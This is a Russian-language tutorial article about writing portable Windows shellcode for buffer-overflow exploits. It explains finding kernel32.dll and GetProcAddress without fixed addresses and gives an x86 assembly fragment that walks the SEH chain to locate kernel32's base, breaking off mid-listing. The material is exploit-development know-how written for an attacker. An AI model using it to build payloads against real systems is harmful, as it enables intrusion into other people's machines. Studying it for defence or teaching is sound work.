Построение переносимого shell-кода для Windows-систем

Станислав Гошко

Всё чаще и чаще обсуждаются аспекты атак на Windows-системы. Основные возможности атак на семейство данных систем были уже рассмотрены, но не стоит забывать о том, что при построении атаки на переполнение буфера в большинстве случаев атакующий сталкивается с построением shell-кода.

Shell-код – это двоичный код, который выполняется в контексте другой программы. Когда уязвимость уже обнаружена и начинается написание эксплоита, необходимо для себя решить, будет ли эксплоит зависеть только от версии уязвимой программы или ещё он будет зависеть от версии операционной системы. Если атакующий хочет, чтобы его эксплоит работал на большинстве систем, то ему необходимо построить shell-код, который бы не опирался на «жёсткие» адреса WIN API-функций.

Для построения такого рода кода необходимо, чтобы shell-код удовлетворял следующим требованиям:

n  Поиск адреса ядра (kernel32.dll).

n  Поиск адреса WIN API-функции GetProcAddress.

n  Поиск адресов других WIN API-функций при помощи функции GetProcAddress.

n  Запуск необходимых нам WIN API-функций по найденным адресам.

Каким образом возможно выполнить первое требование? При запуске любой программы в операционных системах семейства Windows она вызывается из ядра. Поэтому первый и относительно сложный способ поиска адреса ядра основан на поиске в стеке. Но если мы воспользуемся этим способом, то наш shell-код станет очень большим, поэтому мы пойдём другим путём.

Второй способ обнаружения адреса ядра – при помощи SEH. Что же такое SEH? Это структурированный обработчик исключений. К примеру, если мы пытаемся писать в ядро, то будет вызываться исключение и обрабатываться оно будет при помощи SEH. Адрес обработчика исключений всегда лежит внутри ядра, так что для поиска адреса ядра нам всего лишь необходимо найти последний обработчик. По адресу fs:[0] лежит номер текущего обработчика исключений. Ищем, пока не найдём 0xFFFFFFFF (номер системного обработчика). Этот адрес, в отличие от адреса функции ExitThread в NT, всегда лежит в kernel32.dll.

Рассмотрим пример поиска адреса kernel:

           mov    eax, fs:[ebx]              ; Указатель на список обработчиков

           inc    eax                        ; Увеличиваем eax на 1

next_seh:

           xchg   eax, ebx                   ; Обмениваем содержимое eax  c ebx

           mov    eax, [ebx-1]               ; Номер текущего обработчика

           inc    eax                        ; Увеличиваем eax на 1

           jnz    next_seh                   ; Является ли он системным (-1)?

           mov    edx, [ebx-1+4]             ; Адрес обработчика

           xchg   ax, dx                     ; Эквивалентно xor dx,dx (eax=0)

           xor    eax,eax                    ; Обнуляем eax

           mov    ax,1001h                   ; Помещаем в eax

           dec    ax                         ; 1000

next_block:

           cmp    word ptr [edx],'ZM'        ; Начало?

           je     found_MZ                   ; ДА!

           sub    edx,eax                    ; Ищем дальше

           jmp    next_block

found_MZ:                     

           mov    ebx,edx                    ; Сохраним указатель

           mov    edi,dword ptr [edx+3Ch]    ; Адрес PE-заголовка